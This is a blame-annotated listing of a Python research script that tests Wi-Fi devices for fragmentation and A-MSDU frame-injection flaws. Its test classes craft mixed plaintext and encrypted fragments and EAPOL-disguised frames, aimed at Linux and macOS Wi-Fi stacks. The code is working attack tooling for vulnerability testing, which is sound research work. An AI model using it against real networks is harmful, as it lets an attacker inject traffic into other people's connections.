2020-02-27 07:07:19 -05:00
|
|
|
#!/usr/bin/env python3
|
2020-03-01 19:03:08 -05:00
|
|
|
from libwifi import *
|
2020-04-01 10:14:07 -04:00
|
|
|
import abc, sys, socket, struct, time, subprocess, atexit, select, copy
|
2020-04-15 10:27:22 -04:00
|
|
|
import argparse
|
2020-02-27 07:07:19 -05:00
|
|
|
from wpaspy import Ctrl
|
2020-03-13 06:49:58 -04:00
|
|
|
from scapy.contrib.wpa_eapol import WPA_key
|
2020-02-27 07:07:19 -05:00
|
|
|
|
2020-04-20 19:25:54 -04:00
|
|
|
from tests_qca import *
|
|
|
|
|
2020-04-01 11:14:29 -04:00
|
|
|
# Ath9k_htc dongle notes:
|
2020-03-01 19:03:08 -05:00
|
|
|
# - The ath9k_htc devices by default overwrite the injected sequence number.
|
2020-03-13 06:49:58 -04:00
|
|
|
# However, this number is not incremented when the MoreFragments flag is set,
|
2020-03-01 19:03:08 -05:00
|
|
|
# meaning we can inject fragmented frames (albeit with a different sequence
|
|
|
|
# number than then one we use for injection this this script).
|
2020-03-27 12:49:33 -04:00
|
|
|
# - The above trick does not work when we want to inject other frames between
|
|
|
|
# two fragmented frames (the chip will assign them difference sequence numbers).
|
|
|
|
# Even when the fragments use a unique QoS TID, sending frames between them
|
|
|
|
# will make the chip assign difference sequence numbers to both fragments.
|
2020-03-13 06:49:58 -04:00
|
|
|
# - Overwriting the sequence can be avoided by patching `ath_tgt_tx_seqno_normal`
|
2020-03-01 19:03:08 -05:00
|
|
|
# and commenting out the two lines that modify `i_seq`.
|
2020-04-15 10:27:22 -04:00
|
|
|
# - See also the comment in Station.perform_actions to avoid other bugs with
|
2020-03-13 06:49:58 -04:00
|
|
|
# ath9k_htc when injecting frames with the MF flag and while being in AP mode.
|
2020-04-01 11:14:29 -04:00
|
|
|
# - The at9k_htc dongle, and likely other Wi-Fi devices, will reorder frames with
|
|
|
|
# different QoS priorities. This means injected frames with differen priorities
|
|
|
|
# may get reordered by the driver/chip. We avoided this by modifying the ath9k_htc
|
|
|
|
# driver to send all frames using the transmission queue of priority zero,
|
|
|
|
# independent of the actual QoS priority value used in the frame.
|
2020-03-01 19:03:08 -05:00
|
|
|
|
2020-02-29 15:56:41 -05:00
|
|
|
#MAC_STA2 = "d0:7e:35:d9:80:91"
|
|
|
|
#MAC_STA2 = "20:16:b9:b2:73:7a"
|
|
|
|
MAC_STA2 = "80:5a:04:d4:54:c4"
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# ----------------------------------- Utility Commands -----------------------------------
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-02-27 07:07:19 -05:00
|
|
|
def wpaspy_clear_messages(ctrl):
|
2020-03-07 21:10:26 -05:00
|
|
|
# Clear old replies and messages from the hostapd control interface. This is not
|
|
|
|
# perfect and there may be new unrelated messages after executing this code.
|
2020-02-27 07:07:19 -05:00
|
|
|
while ctrl.pending():
|
|
|
|
ctrl.recv()
|
|
|
|
|
|
|
|
def wpaspy_command(ctrl, cmd):
|
|
|
|
wpaspy_clear_messages(ctrl)
|
|
|
|
rval = ctrl.request(cmd)
|
|
|
|
if "UNKNOWN COMMAND" in rval:
|
|
|
|
log(ERROR, "wpa_supplicant did not recognize the command %s. Did you (re)compile wpa_supplicant?" % cmd.split()[0])
|
|
|
|
quit(1)
|
|
|
|
elif "FAIL" in rval:
|
2020-03-29 10:56:59 -04:00
|
|
|
log(ERROR, f"Failed to execute command {cmd}")
|
2020-02-27 07:07:19 -05:00
|
|
|
quit(1)
|
|
|
|
return rval
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
def argv_pop_argument(argument):
|
|
|
|
if not argument in sys.argv: return False
|
|
|
|
idx = sys.argv.index(argument)
|
|
|
|
del sys.argv[idx]
|
|
|
|
return True
|
|
|
|
|
2020-03-04 06:36:52 -05:00
|
|
|
class TestOptions():
|
|
|
|
def __init__(self):
|
2020-03-27 12:49:33 -04:00
|
|
|
# Workaround for ath9k_htc bugs
|
|
|
|
self.inject_workaround = False
|
|
|
|
|
2020-03-04 06:36:52 -05:00
|
|
|
self.interface = None
|
2020-04-15 10:27:22 -04:00
|
|
|
self.ip = None
|
|
|
|
self.peerip = None
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def log_level2switch():
|
|
|
|
if global_log_level == 1: return ["-d", "-K"]
|
|
|
|
elif global_log_level <= 0: return ["-dd", "-K"]
|
|
|
|
return ["-K"]
|
|
|
|
|
2020-04-22 19:14:35 -04:00
|
|
|
#TODO: Move to libwifi?
|
|
|
|
def add_msdu_frag(src, dst, payload):
|
|
|
|
length = len(payload)
|
|
|
|
p = Ether(dst=dst, src=src, type=length)
|
|
|
|
|
|
|
|
payload = raw(payload)
|
|
|
|
|
|
|
|
total_length = len(p) + len(payload)
|
|
|
|
padding = ""
|
|
|
|
if total_length % 4 != 0:
|
|
|
|
padding = b"\x00" * (4 - (total_length % 4))
|
|
|
|
|
|
|
|
return p / payload / Raw(padding)
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# ----------------------------------- Tests -----------------------------------
|
|
|
|
|
|
|
|
# XXX --- We should always first see how the DUT reactions to a normal packet.
|
|
|
|
# For example, Aruba only responded to DHCP after reconnecting, and
|
|
|
|
# ignored ICMP and ARP packets.
|
|
|
|
REQ_ARP, REQ_ICMP, REQ_DHCP = range(3)
|
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
def generate_request(sta, ptype, prior=2):
|
|
|
|
header = sta.get_header(prior=prior)
|
2020-03-30 13:13:21 -04:00
|
|
|
if ptype == REQ_ARP:
|
2020-04-19 08:20:40 -04:00
|
|
|
# Avoid using sta.get_peermac() because the correct MAC addresses may not
|
|
|
|
# always be known (due to difference between AP and router MAC addresses).
|
|
|
|
check = lambda p: ARP in p and p.hwdst == sta.mac and p.pdst == sta.ip and p.psrc == sta.peerip
|
|
|
|
request = LLC()/SNAP()/ARP(op=1, hwsrc=sta.mac, psrc=sta.ip, pdst=sta.peerip)
|
2020-03-30 13:13:21 -04:00
|
|
|
|
|
|
|
elif ptype == REQ_ICMP:
|
|
|
|
label = b"test_ping_icmp"
|
|
|
|
check = lambda p: ICMP in p and label in raw(p)
|
|
|
|
request = LLC()/SNAP()/IP(src=sta.ip, dst=sta.peerip)/ICMP()/Raw(label)
|
|
|
|
|
|
|
|
elif ptype == REQ_DHCP:
|
|
|
|
xid = random.randint(0, 2**31)
|
|
|
|
check = lambda p: BOOTP in p and p[BOOTP].xid == xid
|
|
|
|
|
|
|
|
rawmac = bytes.fromhex(sta.mac.replace(':', ''))
|
|
|
|
request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255")
|
|
|
|
request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid)
|
|
|
|
request = request/DHCP(options=[("message-type", "discover"), "end"])
|
|
|
|
|
|
|
|
# We assume DHCP discover is sent towards the AP.
|
|
|
|
header.addr3 = "ff:ff:ff:ff:ff:ff"
|
|
|
|
|
|
|
|
return header, request, check
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
class Action():
|
2020-03-27 13:23:49 -04:00
|
|
|
# StartAuth: when starting the handshake
|
|
|
|
# BeforeAuth: right before last message of the handshake
|
|
|
|
# AfterAuth: right after last message of the handshake
|
|
|
|
# Connected: 1 second after handshake completed (allows peer to install keys)
|
2020-04-24 09:56:32 -04:00
|
|
|
NoTrigger, StartAuth, BeforeAuth, AfterAuth, Connected = range(5)
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
# GetIp: request an IP before continueing (or use existing one)
|
|
|
|
# Rekey: force or wait for a PTK rekey
|
|
|
|
# Reconnect: force a reconnect
|
2020-04-24 09:56:32 -04:00
|
|
|
# Roam: perform an FT roam
|
|
|
|
# Inject: inject the associated packet
|
|
|
|
# Func: execute a given function
|
|
|
|
# Meta: meta-action used (and removed) during test construction
|
|
|
|
NoAction, GetIp, Rekey, Reconnect, Roam, Inject, Func = range(7)
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-24 09:56:32 -04:00
|
|
|
# Drop: when fragmenting frames, skip the next fragment number. Used in PingTest.
|
|
|
|
MetaDrop = range(0)
|
|
|
|
|
|
|
|
def __init__(self, trigger=Connected, action=Inject, meta_action=None, func=None, enc=False, frame=None, inc_pn=1, delay=None, wait=None, key=None):
|
2020-03-28 13:33:34 -04:00
|
|
|
self.trigger = trigger
|
2020-04-15 10:27:22 -04:00
|
|
|
self.action = action
|
2020-03-28 13:33:34 -04:00
|
|
|
|
2020-04-24 09:56:32 -04:00
|
|
|
self.meta_action = meta_action
|
|
|
|
if self.meta_action != None:
|
|
|
|
self.trigger = Action.NoTrigger
|
|
|
|
self.action = Action.NoAction
|
|
|
|
|
|
|
|
self.func = func
|
2020-04-15 10:27:22 -04:00
|
|
|
if self.func != None:
|
|
|
|
self.action = Action.Func
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-16 00:56:34 -04:00
|
|
|
# Take into account default wait values. A wait value of True means the next
|
|
|
|
# Action will not be immediately executed if it has the same trigger (instead
|
|
|
|
# we have to wait on a new trigger e.g. after rekey, reconnect, roam).
|
|
|
|
self.wait = wait
|
|
|
|
if self.wait == None:
|
|
|
|
self.wait = action in [Action.Rekey, Action.Reconnect, Action.Roam]
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
# Specific to fragment injection
|
|
|
|
self.encrypted = enc
|
2020-03-13 06:49:58 -04:00
|
|
|
self.inc_pn = inc_pn
|
2020-04-03 15:48:03 -04:00
|
|
|
self.delay = delay
|
2020-04-01 10:14:07 -04:00
|
|
|
self.frame = frame
|
2020-04-19 20:15:44 -04:00
|
|
|
self.key = key
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-04-24 09:56:32 -04:00
|
|
|
def is_meta(self, meta):
|
|
|
|
return self.meta_action == meta
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
def get_action(self):
|
|
|
|
return self.action
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def __str__(self):
|
2020-04-24 09:56:32 -04:00
|
|
|
trigger = ["NoTigger", "StartAuth", "BeforeAuth", "AfterAuth", "Connected"][self.trigger]
|
|
|
|
action = ["NoAction", "GetIp", "Rekey", "Reconnect", "Roam", "Inject", "Func"][self.action]
|
2020-04-23 10:19:14 -04:00
|
|
|
return f"Action({trigger}, {action})"
|
|
|
|
|
|
|
|
def __repr__(self):
|
|
|
|
return str(self)
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
class Test(metaclass=abc.ABCMeta):
|
|
|
|
"""
|
|
|
|
Base class to define tests. The default defined methods can be used,
|
|
|
|
but they can also be overriden if desired.
|
|
|
|
"""
|
2020-03-27 15:19:31 -04:00
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
def __init__(self, actions=None):
|
|
|
|
self.actions = actions if actions != None else []
|
2020-03-30 13:13:21 -04:00
|
|
|
self.generated = False
|
2020-04-23 10:19:14 -04:00
|
|
|
self.delay = None
|
|
|
|
self.inc_pn = None
|
2020-03-13 06:49:58 -04:00
|
|
|
|
|
|
|
def next_trigger_is(self, trigger):
|
2020-04-15 10:27:22 -04:00
|
|
|
if len(self.actions) == 0:
|
2020-03-13 06:49:58 -04:00
|
|
|
return False
|
2020-04-24 09:56:32 -04:00
|
|
|
if self.actions[0].trigger == Action.NoTrigger:
|
|
|
|
return True
|
2020-04-15 10:27:22 -04:00
|
|
|
return self.actions[0].trigger == trigger
|
2020-03-29 18:11:35 -04:00
|
|
|
|
2020-04-24 09:56:32 -04:00
|
|
|
def is_next_inject(self):
|
|
|
|
if len(self.actions) == 0:
|
|
|
|
return False
|
|
|
|
if self.actions[0].is_meta(Action.MetaDrop):
|
|
|
|
return True
|
|
|
|
return self.actions[0].action == Action.Inject
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
def next_action(self, station):
|
|
|
|
if len(self.actions) == 0:
|
2020-03-29 18:11:35 -04:00
|
|
|
return None
|
2020-03-27 15:19:31 -04:00
|
|
|
|
2020-04-24 09:56:32 -04:00
|
|
|
if not self.generated and self.is_next_inject():
|
2020-03-30 13:13:21 -04:00
|
|
|
self.generate(station)
|
|
|
|
self.generated = True
|
|
|
|
|
2020-04-19 08:58:35 -04:00
|
|
|
act = self.actions[0]
|
|
|
|
del self.actions[0]
|
|
|
|
return act
|
2020-04-15 10:27:22 -04:00
|
|
|
|
|
|
|
def get_actions(self, action):
|
|
|
|
return [act for act in self.actions if act.action == action]
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
@abc.abstractmethod
|
2020-04-23 10:19:14 -04:00
|
|
|
def prepare(self, station):
|
2020-03-30 13:13:21 -04:00
|
|
|
pass
|
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def generate(self, station):
|
|
|
|
self.prepare(station)
|
|
|
|
self.enforce_delay()
|
|
|
|
self.enforce_inc_pn()
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
@abc.abstractmethod
|
|
|
|
def check(self, p):
|
2020-03-30 13:53:56 -04:00
|
|
|
return False
|
2020-03-30 13:13:21 -04:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def set_options(self, delay=None, inc_pn=None):
|
|
|
|
self.delay = delay
|
|
|
|
self.inc_pn = inc_pn
|
|
|
|
|
|
|
|
def enforce_delay(self):
|
|
|
|
if self.delay == None or self.delay <= 0:
|
|
|
|
return
|
|
|
|
|
|
|
|
# Add a delay between injected fragments if requested
|
|
|
|
for frag in self.get_actions(Action.Inject)[1:]:
|
|
|
|
frag.delay = self.delay
|
|
|
|
|
|
|
|
def enforce_inc_pn(self):
|
|
|
|
if self.inc_pn == None:
|
|
|
|
return
|
|
|
|
|
|
|
|
# Add a delay between injected fragments if requested
|
|
|
|
for frag in self.get_actions(Action.Inject)[1:]:
|
|
|
|
frag.inc_pn = self.inc_pn
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
class PingTest(Test):
|
2020-04-22 19:14:35 -04:00
|
|
|
def __init__(self, ptype, fragments, bcast=False, separate_with=None, as_msdu=False):
|
2020-03-30 13:13:21 -04:00
|
|
|
super().__init__(fragments)
|
|
|
|
self.ptype = ptype
|
2020-04-01 10:14:07 -04:00
|
|
|
self.bcast = bcast
|
|
|
|
self.separate_with = separate_with
|
2020-03-30 13:13:21 -04:00
|
|
|
self.check_fn = None
|
2020-04-22 19:14:35 -04:00
|
|
|
self.as_msdu = as_msdu
|
2020-03-30 13:13:21 -04:00
|
|
|
|
|
|
|
def check(self, p):
|
|
|
|
if self.check_fn == None:
|
|
|
|
return False
|
|
|
|
return self.check_fn(p)
|
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def prepare(self, station):
|
2020-03-30 13:53:56 -04:00
|
|
|
log(STATUS, "Generating ping test", color="green")
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# Generate the header and payload
|
|
|
|
header, request, self.check_fn = generate_request(station, self.ptype)
|
|
|
|
|
2020-04-23 21:15:15 -04:00
|
|
|
if self.as_msdu == 1:
|
2020-04-22 19:14:35 -04:00
|
|
|
# Set the A-MSDU frame type flag in the QoS header
|
|
|
|
header.Reserved = 1
|
|
|
|
# Encapsulate the request in an A-MSDU payload
|
|
|
|
request = add_msdu_frag(station.mac, station.get_peermac(), request)
|
2020-04-23 21:15:15 -04:00
|
|
|
elif self.as_msdu == 2:
|
|
|
|
# Set A-MSDU flag but include a normal payload (fake A-MSDU)
|
|
|
|
header.Reserved = 1
|
2020-04-22 19:14:35 -04:00
|
|
|
|
2020-04-24 09:56:32 -04:00
|
|
|
# Create list of fragment numbers to be used
|
|
|
|
fragnums = []
|
|
|
|
next_fragnum = 0
|
|
|
|
for act in self.actions:
|
|
|
|
if act.is_meta(Action.MetaDrop):
|
|
|
|
next_fragnum += 1
|
|
|
|
elif act.action == Action.Inject:
|
|
|
|
fragnums.append(next_fragnum)
|
|
|
|
next_fragnum += 1
|
|
|
|
self.actions = list(filter(lambda act: not act.is_meta(Action.MetaDrop), self.actions))
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# Generate all the individual (fragmented) frames
|
2020-04-15 10:27:22 -04:00
|
|
|
num_frags = len(self.get_actions(Action.Inject))
|
|
|
|
frames = create_fragments(header, request, num_frags)
|
2020-03-30 13:13:21 -04:00
|
|
|
|
|
|
|
# Assign frames to the existing fragment objects
|
2020-04-15 10:27:22 -04:00
|
|
|
for frag, frame in zip(self.get_actions(Action.Inject), frames):
|
2020-04-01 10:14:07 -04:00
|
|
|
if self.bcast:
|
2020-03-30 18:01:56 -04:00
|
|
|
frame.addr1 = "ff:ff:ff:ff:ff:ff"
|
2020-04-24 09:56:32 -04:00
|
|
|
|
|
|
|
# Assign fragment numbers according to MetaDrop rules
|
|
|
|
frame.SC = (frame.SC & 0xfff0) | fragnums.pop(0)
|
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
frag.frame = frame
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
# Put the separator after each fragment if requested.
|
2020-04-01 10:14:07 -04:00
|
|
|
if self.separate_with != None:
|
2020-04-15 10:27:22 -04:00
|
|
|
for i in range(len(self.actions) - 1, 0, -1):
|
|
|
|
# Check if the previous action is indeed an injection
|
|
|
|
prev_frag = self.actions[i - 1]
|
|
|
|
if prev_frag.action != Action.Inject:
|
|
|
|
continue
|
|
|
|
|
|
|
|
# Create a similar inject action for the seperator
|
|
|
|
sep_frag = Action(prev_frag.trigger, enc=prev_frag.encrypted)
|
2020-04-01 10:14:07 -04:00
|
|
|
sep_frag.frame = self.separate_with.copy()
|
|
|
|
station.set_header(sep_frag.frame)
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
self.actions.insert(i, sep_frag)
|
2020-04-01 10:14:07 -04:00
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
class LinuxTest(Test):
|
|
|
|
def __init__(self, ptype):
|
|
|
|
super().__init__([
|
2020-04-23 21:15:15 -04:00
|
|
|
Action(Action.Connected, Action.GetIp), # XXX we don't always want to wait on this?
|
2020-04-15 10:27:22 -04:00
|
|
|
Action(Action.Connected, enc=True),
|
|
|
|
Action(Action.Connected, enc=True),
|
|
|
|
Action(Action.Connected, enc=False)
|
2020-03-30 13:13:21 -04:00
|
|
|
])
|
|
|
|
self.ptype = ptype
|
2020-03-30 13:53:56 -04:00
|
|
|
self.check_fn = None
|
|
|
|
|
|
|
|
def check(self, p):
|
|
|
|
if self.check_fn == None:
|
|
|
|
return False
|
|
|
|
return self.check_fn(p)
|
2020-03-30 13:13:21 -04:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def prepare(self, station):
|
2020-03-30 13:13:21 -04:00
|
|
|
header, request, self.check_fn = generate_request(station, self.ptype)
|
|
|
|
frag1, frag2 = create_fragments(header, request, 2)
|
|
|
|
|
|
|
|
# Fragment 1: normal
|
2020-04-15 10:27:22 -04:00
|
|
|
self.actions[0].frame = frag1
|
2020-03-30 13:13:21 -04:00
|
|
|
|
2020-04-23 15:43:47 -04:00
|
|
|
# Fragment 2: make Linux update latest used crypto Packet Number. Use a dummy packet
|
|
|
|
# that can't accidently aggregate with the first fragment in a corrrect packet.
|
2020-04-24 08:21:15 -04:00
|
|
|
p = station.get_header()/LLC()/SNAP()/IP()/Raw(b"linux_plain decoy fragment")
|
2020-04-23 15:43:47 -04:00
|
|
|
p.SC = frag2.SC ^ (1 << 4)
|
|
|
|
self.actions[1].frame = p
|
2020-03-30 13:13:21 -04:00
|
|
|
|
|
|
|
# Fragment 3: can now inject last fragment as plaintext
|
2020-04-15 10:27:22 -04:00
|
|
|
self.actions[2].frame = frag2
|
2020-03-30 13:13:21 -04:00
|
|
|
|
|
|
|
class MacOsTest(Test):
|
|
|
|
"""
|
|
|
|
See docs/macoxs-reversing.md for background on the attack.
|
|
|
|
"""
|
2020-04-23 12:38:54 -04:00
|
|
|
def __init__(self, ptype, actions):
|
|
|
|
super().__init__(actions)
|
2020-03-30 13:13:21 -04:00
|
|
|
self.ptype = ptype
|
2020-03-30 13:53:56 -04:00
|
|
|
self.check_fn = None
|
|
|
|
|
|
|
|
def check(self, p):
|
|
|
|
if self.check_fn == None:
|
|
|
|
return False
|
|
|
|
return self.check_fn(p)
|
2020-03-30 13:13:21 -04:00
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def prepare(self, station):
|
2020-03-30 13:13:21 -04:00
|
|
|
# First fragment is the start of an EAPOL frame
|
|
|
|
header = station.get_header(prior=2)
|
|
|
|
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
|
|
|
|
frag1, _ = create_fragments(header, data=request, num_frags=2)
|
|
|
|
|
|
|
|
# Second fragment has same sequence number. Will be accepted
|
|
|
|
# before authenticated because previous fragment was EAPOL.
|
|
|
|
# By sending to broadcast, this fragment will not be reassembled
|
|
|
|
# though, meaning it will be treated as a full frame (and not EAPOL).
|
|
|
|
_, request, self.check_fn = generate_request(station, self.ptype)
|
2020-03-30 13:53:56 -04:00
|
|
|
frag2, = create_fragments(header, data=request, num_frags=1)
|
2020-03-30 18:01:56 -04:00
|
|
|
frag2.SC |= 1
|
2020-03-30 13:13:21 -04:00
|
|
|
frag2.addr1 = "ff:ff:ff:ff:ff:ff"
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
self.actions[0].frame = frag1
|
|
|
|
self.actions[1].frame = frag2
|
2020-03-30 13:13:21 -04:00
|
|
|
|
|
|
|
class EapolTest(Test):
|
|
|
|
# TODO:
|
|
|
|
# Test 1: plain unicast EAPOL fragment, plaintext broadcast frame => trivial frame injection
|
|
|
|
# Test 2: plain unicast EAPOL fragment, encrypted broadcast frame => just an extra test
|
|
|
|
# Test 3: plain unicast EAPOL fragment, encrypted unicast fragment => demonstrates mixing of plain/encrypted fragments
|
|
|
|
# Test 4: EAPOL and A-MSDU tests?
|
|
|
|
def __init__(self):
|
|
|
|
super().__init__([
|
2020-04-15 10:27:22 -04:00
|
|
|
Action(Action.BeforeAuth, enc=False),
|
|
|
|
Action(Action.BeforeAuth, enc=False)
|
2020-03-30 13:13:21 -04:00
|
|
|
])
|
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def prepare(self, station):
|
2020-03-30 13:13:21 -04:00
|
|
|
header = station.get_header(prior=2)
|
|
|
|
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
|
|
|
|
frag1, frag2 = create_fragments(header, data=request, num_frags=2)
|
|
|
|
|
|
|
|
frag1copy, frag2copy = create_fragments(header, data=request, num_frags=2)
|
|
|
|
frag1copy.addr1 = "ff:ff:ff:ff:ff:ff"
|
|
|
|
frag2copy.addr1 = "ff:ff:ff:ff:ff:ff"
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
self.actions[0].frame = frag1
|
|
|
|
self.actions[0].frame = frag2
|
2020-03-30 13:13:21 -04:00
|
|
|
|
2020-04-03 15:48:34 -04:00
|
|
|
|
|
|
|
class EapolMsduTest(Test):
|
2020-04-23 11:50:21 -04:00
|
|
|
def __init__(self, ptype, actions):
|
|
|
|
super().__init__(actions)
|
2020-04-03 15:48:34 -04:00
|
|
|
self.ptype = ptype
|
|
|
|
self.check_fn = None
|
|
|
|
|
|
|
|
def check(self, p):
|
|
|
|
if self.check_fn == None:
|
|
|
|
return False
|
|
|
|
return self.check_fn(p)
|
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
def prepare(self, station):
|
2020-04-03 15:48:34 -04:00
|
|
|
log(STATUS, "Generating ping test", color="green")
|
|
|
|
|
|
|
|
# Generate the single frame
|
|
|
|
header, request, self.check_fn = generate_request(station, self.ptype)
|
|
|
|
# Set the A-MSDU frame type flag in the QoS header
|
|
|
|
header.Reserved = 1
|
|
|
|
# Testing
|
2020-04-15 10:27:22 -04:00
|
|
|
#header.addr2 = "00:11:22:33:44:55"
|
2020-04-03 15:48:34 -04:00
|
|
|
|
|
|
|
# Masquerade A-MSDU frame as an EAPOL frame
|
2020-04-19 08:20:40 -04:00
|
|
|
request = LLC()/SNAP()/EAPOL()/Raw(b"\x00\x06AAAAAA") / add_msdu_frag(station.mac, station.get_peermac(), request)
|
2020-04-03 15:48:34 -04:00
|
|
|
|
|
|
|
frames = create_fragments(header, request, 1)
|
|
|
|
|
2020-04-23 11:50:21 -04:00
|
|
|
# XXX Where was this needed again?
|
2020-04-03 15:48:34 -04:00
|
|
|
auth = Dot11()/Dot11Auth(status=0, seqnum=1)
|
|
|
|
station.set_header(auth)
|
|
|
|
auth.addr2 = "00:11:22:33:44:55"
|
|
|
|
|
2020-04-15 10:27:22 -04:00
|
|
|
self.actions[0].frame = auth
|
|
|
|
self.actions[1].frame = frames[0]
|
2020-04-03 15:48:34 -04:00
|
|
|
|
2020-04-19 09:30:41 -04:00
|
|
|
|
2020-03-30 13:13:21 -04:00
|
|
|
# ----------------------------------- Abstract Station Class -----------------------------------
|
2020-03-27 15:19:31 -04:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
class Station():
|
|
|
|
def __init__(self, daemon, mac, ds_status):
|
|
|
|
self.daemon = daemon
|
|
|
|
self.options = daemon.options
|
2020-03-30 13:53:56 -04:00
|
|
|
self.test = daemon.options.test
|
2020-03-13 06:49:58 -04:00
|
|
|
self.txed_before_auth = False
|
|
|
|
self.txed_before_auth_done = False
|
2020-03-24 08:52:31 -04:00
|
|
|
self.obtained_ip = False
|
2020-04-19 08:58:35 -04:00
|
|
|
self.waiting_on_ip = False
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-03-29 18:11:35 -04:00
|
|
|
# Don't reset PN to have consistency over rekeys and reconnects
|
2020-03-27 12:58:11 -04:00
|
|
|
self.reset_keys()
|
2020-03-29 18:11:35 -04:00
|
|
|
self.pn = 0x100
|
2020-02-27 07:07:19 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
# Contains either the "to-DS" or "from-DS" flag.
|
|
|
|
self.FCfield = Dot11(FCfield=ds_status).FCfield
|
2020-03-27 14:22:12 -04:00
|
|
|
self.seqnum = 1
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
# MAC address and IP of the station that our script controls.
|
|
|
|
# Can be either an AP or client.
|
|
|
|
self.mac = mac
|
|
|
|
self.ip = None
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-04-19 08:20:40 -04:00
|
|
|
# MAC address of the BSS. This is always the AP.
|
|
|
|
self.bss = None
|
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
# MAC address and IP of the peer station.
|
|
|
|
# Can be either an AP or client.
|
|
|
|
self.peermac = None
|
|
|
|
self.peerip = None
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-07 21:10:26 -05:00
|
|
|
# To test frame forwarding to a 3rd party
|
|
|
|
self.othermac = None
|
|
|
|
self.otherip = None
|
|
|
|
|
2020-04-19 08:58:35 -04:00
|
|
|
# To trigger Connected event 1-2 seconds after Authentication
|
2020-03-27 13:23:49 -04:00
|
|
|
self.time_connected = None
|
|
|
|
|
2020-03-27 12:58:11 -04:00
|
|
|
def reset_keys(self):
|
|
|
|
self.tk = None
|
|
|
|
self.gtk = None
|
|
|
|
self.gtk_idx = None
|
2020-03-13 06:49:58 -04:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_mon(self, p):
|
2020-03-29 18:11:35 -04:00
|
|
|
pass
|
2020-03-04 06:36:52 -05:00
|
|
|
|
2020-03-25 09:53:38 -04:00
|
|
|
def handle_eth(self, p):
|
|
|
|
repr(repr(p))
|
2020-03-24 08:52:31 -04:00
|
|
|
|
2020-03-28 13:33:34 -04:00
|
|
|
if self.test != None and self.test.check != None and self.test.check(p):
|
2020-03-25 09:53:38 -04:00
|
|
|
log(STATUS, "SUCCESSFULL INJECTION", color="green")
|
2020-04-23 10:19:14 -04:00
|
|
|
log(STATUS, "Received packet: " + repr(p))
|
2020-03-30 13:53:56 -04:00
|
|
|
self.test = None
|
2020-03-07 21:10:26 -05:00
|
|
|
|
2020-03-27 12:58:11 -04:00
|
|
|
def send_mon(self, data, prior=1):
|
|
|
|
"""
|
|
|
|
Right after completing the handshake, it occurred several times that our
|
|
|
|
script was sending data *before* the key had been installed (or the port
|
|
|
|
authorized). This meant traffic was dropped. Use this function to manually
|
|
|
|
send frames over the monitor interface to ensure delivery and encryption.
|
|
|
|
"""
|
|
|
|
|
|
|
|
# If it contains an Ethernet header, strip it, and take addresses from that
|
|
|
|
p = self.get_header(prior=prior)
|
|
|
|
if Ether in data:
|
|
|
|
payload = data.payload
|
|
|
|
p.addr2 = data.src
|
|
|
|
|
|
|
|
# This tests if to-DS is set
|
|
|
|
if p.FCfield & 1:
|
|
|
|
p.addr3 = data.dst
|
|
|
|
else:
|
|
|
|
p.addr1 = data.dst
|
|
|
|
|
|
|
|
else:
|
|
|
|
payload = data
|
|
|
|
|
|
|
|
p = p/LLC()/SNAP()/payload
|
|
|
|
if self.tk: p = self.encrypt(p)
|
|
|
|
|
2020-04-23 10:19:14 -04:00
|
|
|
log(STATUS, "[Injecting] " + repr(p))
|
2020-03-27 12:58:11 -04:00
|
|
|
daemon.inject_mon(p)
|
|
|
|
|
2020-03-10 09:43:46 -04:00
|
|
|
def set_header(self, p, forward=False, prior=None):
|
2020-03-07 21:10:26 -05:00
|
|
|
"""Set addresses to send frame to the peer or the 3rd party station."""
